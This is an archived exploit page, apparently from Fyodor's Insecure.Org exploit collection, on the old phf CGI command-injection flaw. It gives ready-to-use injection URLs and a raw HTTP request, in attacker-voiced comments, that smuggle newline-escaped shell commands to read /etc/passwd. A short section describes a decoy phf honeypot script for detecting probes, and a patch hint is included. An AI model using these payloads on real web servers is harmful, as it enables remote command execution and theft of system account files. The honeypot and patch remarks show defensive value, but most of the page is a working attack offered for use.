/cgi-bin/phf vulnerability

Description:A VERY well known character escaping vulnerabity in some phf cgi scripts.
Compromise:Generally 'nobody' or 'daemon', but sometimes root . Whatever httpd is running. (REMOTE)
Vulnerable Systems:Many old web server distributions came with phf installed
Date:January 1996 or something like that.
Notes:Since some systems have vulnerable bash, you can also try http://host.com/cgi-bin/phf?Qalias=%ff/bin/cat%20/etc/passwd. Also see addendum for a fake phf script to fool would-be crackers. After that I've put a phf exploit with a little more obfuscation.


It is something like http://host.com/cgi-bin/phf?Qalias=%0A/bin/cat%20/etc/passwd


 Recently I have seen quite an upswing in attacks against web servers,
with people trying exploit various CGI binaries, including Phf.  Phf has a
known vulnerability that is being widely exploited in how it handles
certain escaped arguments.

 To let me know of attacks on sites via this vulnerability, I installed
the following script on our web servers. I don't run phf on our systems,
so there is no problem of interrupting normal activity.  The script simply
looks like the original PHF program, however it mails the security person
whenever connections or probes are received.

 The idea of luring attacks and presenting false information in an
interesting one, as an attacker needs to find a vulnerability to exploit
to get into the system. If vulnerabilities are presented that are not
legitimate, it is more difficult for an attacker to decide what is
legitimate, and what is just bait. If people wish to attack a system, they
take the risk that they are either falling into a trap, or actually
getting into the system.  Its interesting to blur the two.  Along with
scripts like below, people can play games with modified sendmail version
lines, or even presenting false login screens with the tcp wrapper twist.

 In any case, the script below was just thrown together as an example.  On
some sites, I run one similar to it, and it works very well as an early
warning against attacks.  Before running it, I would certainly look it
over to decide if its safe for your system.  If you see problems, please
let me know.

Paul Danckaert


# Pseudo-Phf  -  A not-quite-real phf replacement that provides a warning
#                       against attacks, as well as presenting false
#                       information to the attacker.
# Paul Danckaert (pauld@lemur.org)

[For the actual program, read the source to this html page ... -Fyodor]

# Even someone on #hack could figure this exploit out.
# telnet to host port 80 and paste the following.
# to patch this simply zero out the perms for phf or better off, rm it.
# any cgi script using escape_shell_cmd is exploitable as well.
# this works on ncsa/apache versions of httpd.
# r00t owns you.  Now more than ever.

/cgi-bin/phf?Jserver=foobar.com%0Acat%20/etc/passwd%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0
Accept: */*
Accept: application/x-wais-source
Accept: text/plain
Accept: text/html
Accept: www/mime
User-Agent:  Lynx/2.3 BETA  libwww/2.14
Referer:  http://localhost/cgi-bin/phf

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: